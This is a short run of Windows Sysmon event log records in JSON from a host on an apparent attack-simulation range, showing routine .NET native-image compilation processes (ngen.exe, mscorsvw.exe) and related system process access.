{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6462,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.478\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-001088330C00}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.478","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-001088330C00}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6463,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.478\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-001088330C00}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.478","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-001088330C00}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6464,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.494\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-001088330C00}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.494","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-001088330C00}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6465,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:27.556\r\nProcessGuid: {A837DB8D-0447-5F25-0000-001088330C00}\r\nProcessId: 4480\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1180-0\\System.Runtime.WindowsRuntime.UI.Xaml.dll\r\nCreationUtcTime: 2020-08-01 05:57:27.556","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:27.556","ProcessGuid":"{A837DB8D-0447-5F25-0000-001088330C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1180-0\\System.Runtime.WindowsRuntime.UI.Xaml.dll","CreationUtcTime":"2020-08-01 05:57:27.556","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6466,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.587\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-001007370C00}\r\nTargetProcessId: 4332\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.587","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-001007370C00}","TargetProcessId":"4332","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6467,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.587\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-001007370C00}\r\nTargetProcessId: 4332\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.587","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-001007370C00}","TargetProcessId":"4332","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6468,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.603\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-001007370C00}\r\nTargetProcessId: 4332\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.603","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-001007370C00}","TargetProcessId":"4332","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6469,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.681\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-0010A63A0C00}\r\nTargetProcessId: 4264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.681","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-0010A63A0C00}","TargetProcessId":"4264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6470,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.681\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-0010A63A0C00}\r\nTargetProcessId: 4264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.681","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-0010A63A0C00}","TargetProcessId":"4264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
